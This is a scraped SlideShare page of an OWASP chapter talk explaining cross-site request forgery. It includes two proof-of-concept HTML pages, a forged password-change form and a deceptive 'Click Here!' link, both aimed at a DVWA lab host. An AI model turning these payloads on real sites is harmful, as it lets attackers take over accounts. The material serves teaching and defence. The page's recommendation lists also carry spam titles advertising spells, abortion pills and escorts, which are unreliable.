SlideShare a Scribd company logo

Understanding CSRF

Potato
Potato

Understanding the Behaviour of CSRF, How to create a Simple POC,

Software
1 of 23
Download to read offline
CROSS SITE REQUEST FORGERY UNDERSTANDING John Patrick Lita - OWASP Manila Chapter President Venue: Philippine Army, Cyber Security Division, Taguig City
 OWASP Taguig Chapter
DEEP UNDERSTANDING WITH CSRF VULNERABILITY MEET THE PRESENTER OWASP Manila Chapter President
 Project Manager at Enterprise Linux Professionals
 Owner of Active Security Training and Consultancy
 Project leader for 
 OWASP Online Academy john.patrick.lita@owasp.org 2
DEEP UNDERSTANDING WITH CSRF VULNERABILITY CROSS SITE REQUEST FORGERY Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. 3
DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 4 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST
DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 5 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM AWESOME!
DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 6 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM AWESOME! Jaypee: I AM AWESOME!
DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 7 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB!
DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 8 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB!
DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 9 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB! Jaypee: I AM NOOB!
DEEP UNDERSTANDING WITH CSRF VULNERABILITY CANNOT READ THE ANTI-CSRF 10
DEEP UNDERSTANDING WITH CSRF VULNERABILITY NO SERVER SIDE VALIDATION 11
DEEP UNDERSTANDING WITH CSRF VULNERABILITY REVIEWING THE FORM 12
DEEP UNDERSTANDING WITH CSRF VULNERABILITY THE CHECKING THE SOURCE CODE 13
CSRF DEMO DEEP UNDERSTANDING WITH CSRF VULNERABILITY
PREVENTION MEASURES THAT DO NOT WORK CSRF TEMPLATE WEB INTERFACE Try to copy the code of the CSRF Template and save it as HTML File. then open the file with any 
 browser you like. then click the submit and analyse the behaviour.
 
 After that try yo login. please proceed to next page for source code. Page 16 15
PREVENTION MEASURES THAT DO NOT WORK CSRF TEMPLATE SOURCE CODE <!DOCTYPE html> <html>
 <head>
 <title>CSRF Template</title>
 </head>
 <body>
 <br> <form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET"> New Password:<br>
 <input type="password" AUTOCOMPLETE="off" name="password_new" value="12345"><br>
 Confirm New Password: <br>
 <input type="password" AUTOCOMPLETE="off" name="password_conf" value="12345"><br>
 <input type="submit" value="Change" name="Change">
 
 </form>
 </body>
 </html> 16
PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Using a secret cookie ▸ Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request. 17
PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Only Accept POST requests ▸ Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else. POST
 REQUEST 18
PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Multi-Step Transaction
 Multi-Step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible. ▸ URL Rewriting
 This might be seen as a useful CSRF prevention technique as the attacker cannot guess the victim's session ID. However, the user’s session ID is exposed in the URL. We don't recommend fixing one security flaw by introducing another. ▸ HTTPS
 HTTPS does nothing to defend against CSRF. 19
CSRF DEMO DEEP UNDERSTANDING WITH CSRF VULNERABILITY
PREVENTION MEASURES THAT DO NOT WORK CSRF ATTACK USING SOCIAL ENGINEERING One of the technique or attack vector is to perform a click jacking attack, to test this attack please 
 proceed on the next page for the source code, then try to executing it by clicking the “Click Here!” 21
PREVENTION MEASURES THAT DO NOT WORK CSRF ATTACK USING SOCIAL ENGINEERING <!DOCTYPE html> <html>
 <title>Please Check your Account Here!</title>
 <head>Check your account Here!</head>
 <body> <a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/? password_new=password&password_conf=password&Change=Change#">Click Here!</a>
 
 </body>
 </html>
JOHN.PATRICK.LITA@OWASP.ORG THANK YOU FOR LISTENING

Recommended

Introduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & DefenseIntroduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & Defense
Surya Subhash
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request Forgery
Tony Bibbs
 
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
Russ McRee
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
Eoin Keary
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
Understanding dom based xss
Understanding dom based xssUnderstanding dom based xss
Understanding dom based xss
Potato
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
Bilal Mazhar MS(IS)Cyber Security II Privacy Professional
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 

Recommended

Introduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & DefenseIntroduction to CSRF Attacks & Defense
Introduction to CSRF Attacks & Defense
Surya Subhash
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request Forgery
Tony Bibbs
 
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
Russ McRee
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
Eoin Keary
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
Understanding dom based xss
Understanding dom based xssUnderstanding dom based xss
Understanding dom based xss
Potato
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
Bilal Mazhar MS(IS)Cyber Security II Privacy Professional
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
XSS- an application security vulnerability
XSS- an application security vulnerabilityXSS- an application security vulnerability
XSS- an application security vulnerability
Soumyasanto Sen
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
n|u - The Open Security Community
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVC
Suvash Shah
 
Grey H@t - Cross-site Request Forgery
Grey H@t - Cross-site Request ForgeryGrey H@t - Cross-site Request Forgery
Grey H@t - Cross-site Request Forgery
Christopher Grayson
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery Vulnerabilities
Marco Morana
 
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Capgemini
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
Daisuke_Dan
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
Aaron Weaver
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
Albena Asenova-Belal
 
Csrf not all defenses are created equal
Csrf not all defenses are created equalCsrf not all defenses are created equal
Csrf not all defenses are created equal
Ari Elias-Bachrach
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
n|u - The Open Security Community
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
vinayh.vaghamshi _
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
kinish kumar
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
Ali Mattash
 
XSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing toolXSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing tool
Arjun Jain
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
Mohammed A. Imran
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
InMobi Technology
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
Cyber Security - ICCT Colleges
Cyber Security - ICCT CollegesCyber Security - ICCT Colleges
Cyber Security - ICCT Colleges
Potato
 
Understanding sql Injection
Understanding sql InjectionUnderstanding sql Injection
Understanding sql Injection
Potato
 

More Related Content

What's hot

CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVC
Suvash Shah
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery Vulnerabilities
Marco Morana
 
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Capgemini
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
Daisuke_Dan
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
Ali Mattash
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
InMobi Technology
 

What's hot (20)

XSS- an application security vulnerability
XSS- an application security vulnerabilityXSS- an application security vulnerability
XSS- an application security vulnerability
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVC
 
Grey H@t - Cross-site Request Forgery
Grey H@t - Cross-site Request ForgeryGrey H@t - Cross-site Request Forgery
Grey H@t - Cross-site Request Forgery
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery Vulnerabilities
 
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
 
Csrf not all defenses are created equal
Csrf not all defenses are created equalCsrf not all defenses are created equal
Csrf not all defenses are created equal
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
 
XSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing toolXSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing tool
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 

Viewers also liked

Cyber Security - ICCT Colleges
Cyber Security - ICCT CollegesCyber Security - ICCT Colleges
Cyber Security - ICCT Colleges
Potato
 
IOT Security - ICCT College of Engineering
IOT Security - ICCT College of EngineeringIOT Security - ICCT College of Engineering
IOT Security - ICCT College of Engineering
Potato
 
Bab1 dasar dasar komputer personal
Bab1 dasar dasar komputer personalBab1 dasar dasar komputer personal
Bab1 dasar dasar komputer personal
Agung Sakepris
 
Benefits of formative eAssessment and reusable questions
Benefits of formative eAssessment and reusable questionsBenefits of formative eAssessment and reusable questions
Benefits of formative eAssessment and reusable questions
dewiparry
 

Viewers also liked (20)

Cyber Security - ICCT Colleges
Cyber Security - ICCT CollegesCyber Security - ICCT Colleges
Cyber Security - ICCT Colleges
 
Understanding sql Injection
Understanding sql InjectionUnderstanding sql Injection
Understanding sql Injection
 
IOT Security - ICCT College of Engineering
IOT Security - ICCT College of EngineeringIOT Security - ICCT College of Engineering
IOT Security - ICCT College of Engineering
 
Web appsec and it’s 10 best SDLC practices
Web appsec and it’s 10 best SDLC practicesWeb appsec and it’s 10 best SDLC practices
Web appsec and it’s 10 best SDLC practices
 
Ayurveda for fall health
Ayurveda for fall healthAyurveda for fall health
Ayurveda for fall health
 
Bab1 dasar dasar komputer personal
Bab1 dasar dasar komputer personalBab1 dasar dasar komputer personal
Bab1 dasar dasar komputer personal
 
Tindak misioner dalam pemikiran St. Conforti
Tindak misioner dalam pemikiran St. ConfortiTindak misioner dalam pemikiran St. Conforti
Tindak misioner dalam pemikiran St. Conforti
 
Marco,cabrera;proyectos;primer,parcial
Marco,cabrera;proyectos;primer,parcialMarco,cabrera;proyectos;primer,parcial
Marco,cabrera;proyectos;primer,parcial
 
QCL-14-v3_[Pareto Diagram]_[SIIB]_[Sandeep Majumder]
QCL-14-v3_[Pareto Diagram]_[SIIB]_[Sandeep Majumder]QCL-14-v3_[Pareto Diagram]_[SIIB]_[Sandeep Majumder]
QCL-14-v3_[Pareto Diagram]_[SIIB]_[Sandeep Majumder]
 
2014 Shipper Symposium - Becoming a Shipper of Choice
2014 Shipper Symposium - Becoming a Shipper of Choice2014 Shipper Symposium - Becoming a Shipper of Choice
2014 Shipper Symposium - Becoming a Shipper of Choice
 
Retret panggilan adalah suatu proses
Retret panggilan adalah suatu prosesRetret panggilan adalah suatu proses
Retret panggilan adalah suatu proses
 
Fish silage project
Fish silage projectFish silage project
Fish silage project
 
Konfigurasi server debian
Konfigurasi server debianKonfigurasi server debian
Konfigurasi server debian
 
Benefits of formative eAssessment and reusable questions
Benefits of formative eAssessment and reusable questionsBenefits of formative eAssessment and reusable questions
Benefits of formative eAssessment and reusable questions
 
metode numerik stepest descent dengan rerata aritmatika
metode numerik stepest descent dengan rerata aritmatikametode numerik stepest descent dengan rerata aritmatika
metode numerik stepest descent dengan rerata aritmatika
 
Tugas Metode Numerik Biseksi Pendidikan Matematika UMT
Tugas Metode Numerik Biseksi Pendidikan Matematika UMTTugas Metode Numerik Biseksi Pendidikan Matematika UMT
Tugas Metode Numerik Biseksi Pendidikan Matematika UMT
 
Cómo lograr una vida mejor
Cómo lograr una vida mejorCómo lograr una vida mejor
Cómo lograr una vida mejor
 
CS101- Introduction to Computing- Lecture 30
CS101- Introduction to Computing- Lecture 30CS101- Introduction to Computing- Lecture 30
CS101- Introduction to Computing- Lecture 30
 
Tugas Metode numerik newton Pendidikan Matematika UMT
Tugas Metode numerik newton Pendidikan Matematika UMTTugas Metode numerik newton Pendidikan Matematika UMT
Tugas Metode numerik newton Pendidikan Matematika UMT
 
CS101- Introduction to Computing- Lecture 34
CS101- Introduction to Computing- Lecture 34CS101- Introduction to Computing- Lecture 34
CS101- Introduction to Computing- Lecture 34
 

Similar to Understanding CSRF

A4 A K S H A Y B H A R D W A J
A4 A K S H A Y B H A R D W A JA4 A K S H A Y B H A R D W A J
A4 A K S H A Y B H A R D W A J
bhardwajakshay
 
CSRF Attacks and its Defence using Middleware
CSRF Attacks and its Defence using MiddlewareCSRF Attacks and its Defence using Middleware
CSRF Attacks and its Defence using Middleware
ijtsrd
 
CSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_GrossmanCSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_Grossman
guestdb261a
 

Similar to Understanding CSRF (20)

CSRF
CSRFCSRF
CSRF
 
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
Prevention Against CSRF Attack using Client Server Mutual Authentication Tech...
 
A4 A K S H A Y B H A R D W A J
A4 A K S H A Y B H A R D W A JA4 A K S H A Y B H A R D W A J
A4 A K S H A Y B H A R D W A J
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
PENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATION
PENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATIONPENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATION
PENETRATION TEST ( CLIENT-SIDE ) CSRF / CORS MISCONFIGURATION
 
CUSRF | It's Pronounced "See You Surf" and It's Dangerous
CUSRF | It's Pronounced "See You Surf" and It's DangerousCUSRF | It's Pronounced "See You Surf" and It's Dangerous
CUSRF | It's Pronounced "See You Surf" and It's Dangerous
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
 
Mitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codes
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
 
4774.projectb.securitysquad
4774.projectb.securitysquad4774.projectb.securitysquad
4774.projectb.securitysquad
 
CSRF Attacks and its Defence using Middleware
CSRF Attacks and its Defence using MiddlewareCSRF Attacks and its Defence using Middleware
CSRF Attacks and its Defence using Middleware
 
Security Protection for WordPress
Security Protection for WordPressSecurity Protection for WordPress
Security Protection for WordPress
 
Cross Site Request Forgery- CSRF
Cross Site Request Forgery- CSRF Cross Site Request Forgery- CSRF
Cross Site Request Forgery- CSRF
 
CSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_GrossmanCSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_Grossman
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developers
 
Implementing a comprehensive application security progaram - Tawfiq
Implementing a comprehensive application security progaram - Tawfiq Implementing a comprehensive application security progaram - Tawfiq
Implementing a comprehensive application security progaram - Tawfiq
 
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptxINTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
INTERNSHIPREVIEW-ISHAQ (1) [Recovered].pptx
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf
 
Cyber security
Cyber securityCyber security
Cyber security
 

Recently uploaded

%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
masabamasaba
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
masabamasaba
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Nitya salvi
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 

Recently uploaded (20)

%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
 
%in Lydenburg+277-882-255-28 abortion pills for sale in Lydenburg
%in Lydenburg+277-882-255-28 abortion pills for sale in Lydenburg%in Lydenburg+277-882-255-28 abortion pills for sale in Lydenburg
%in Lydenburg+277-882-255-28 abortion pills for sale in Lydenburg
 
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK SoftwareAnnouncing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK Software
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
Generic or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisionsGeneric or specific? Making sensible software design decisions
Generic or specific? Making sensible software design decisions
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
%in Harare+277-882-255-28 abortion pills for sale in Harare
%in Harare+277-882-255-28 abortion pills for sale in Harare%in Harare+277-882-255-28 abortion pills for sale in Harare
%in Harare+277-882-255-28 abortion pills for sale in Harare
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 

Understanding CSRF

